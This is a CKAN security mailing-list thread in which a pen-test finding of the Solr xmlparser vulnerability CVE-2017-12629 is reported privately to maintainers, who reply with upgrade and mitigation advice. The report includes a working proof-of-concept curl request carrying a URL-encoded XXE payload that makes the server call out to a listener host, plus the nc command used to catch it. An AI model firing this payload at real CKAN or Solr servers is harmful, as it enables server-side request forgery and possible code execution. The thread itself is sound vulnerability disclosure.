[CKAN-Security] solr 6.2

David Read david.read at hackneyworkshop.com
Thu Feb 22 13:20:02 UTC 2018


Good suggestion to upgrade solr.

By the way, I have a quick patch for CKAN I have prepared this morning that
I can put forward tomorrow (to CKAN security team only).
D

On Thu, 22 Feb 2018 at 09:28, Adrià Mercader <adria.mercader at okfn.org>
wrote:

> Apologies, I misread the available versions and in fact the upgrade is
> from 6.2 to 6.6.2.
>
> In any case and given the use CKAN makes of Solr I don't see any potential
> issues with the upgrade after going through the changes list:
>
>
> https://lucene.apache.org/solr/guide/6_6/upgrading-solr.html#UpgradingSolr-Upgradingfromearlier6.xversions
>
>
> Hope this helps,
>
> Adrià
>
>
> On 22 February 2018 at 09:55, Adrià Mercader <adria.mercader at okfn.org>
> wrote:
>
>> Hi JD,
>>
>> Many thanks for the report. We have received reports from this issue and
>> are preparing patches and/or updates to help mitigate it. If you are using
>> the Docker image included in contrib the easiest fix is just to use the
>> solr:6.2.2 image as this one includes the fix for the issue:
>>
>>
>> https://lucene.apache.org/solr/news.html#18-october-2017-apache-solrtm-662-available
>>
>> It only includes this bug fix so it should not cause any compatibility
>> issues.
>>
>> We will update the image in contrib asap, and let you know of any
>> mitigation steps that we take.
>>
>> Best regards,
>>
>> Adrià
>>
>> On 21 February 2018 at 08:53, JD Bothma <jd at openup.org.za> wrote:
>>
>>> Hi
>>>
>>> We've contracted someone to pen-test data.vulekamali.gov.za who found
>>> the following critical vulnerability in CKAN 6.2 as used in the Dockerfile
>>> under contrib
>>>
>>> https://www.cvedetails.com/cve/CVE-2017-12629/
>>> https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
>>>
>>> We're launching our portal right now so not comfortable upgrading solr
>>> just yet, but remapping the xmlparser name to the edismax class has
>>> mitigated it for us for now. See
>>> https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list
>>>
>>> I confirmed the vulnerability with the following curl request against a
>>> locally-running ckan instance:
>>> curl -v
>>> localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D
>>>
>>> On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when
>>> running the request against ckan, I saw a GET request in nc. You can also
>>> verify the vulnerability by looking for "Connection Refused" in the error
>>> response which shows the server tried to request the DOCTYPE you told it
>>> to, and would have executed malicious code you would have served.
>>>
>>> Best
>>> JD
>>>
>>> _______________________________________________
>>> CKAN security
>>> https://lists.okfn.org/mailman/listinfo/security
>>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>>>
>>> Repo: https://github.com/ckan/ckan-security
>>>
>>
>>
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
>
> https://lists.okfn.org/mailman/options/security/david.read%40hackneyworkshop.com
>
> Repo: https://github.com/ckan/ckan-security
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20180222/e9bdf0a6/attachment-0001.html>


More information about the Security mailing list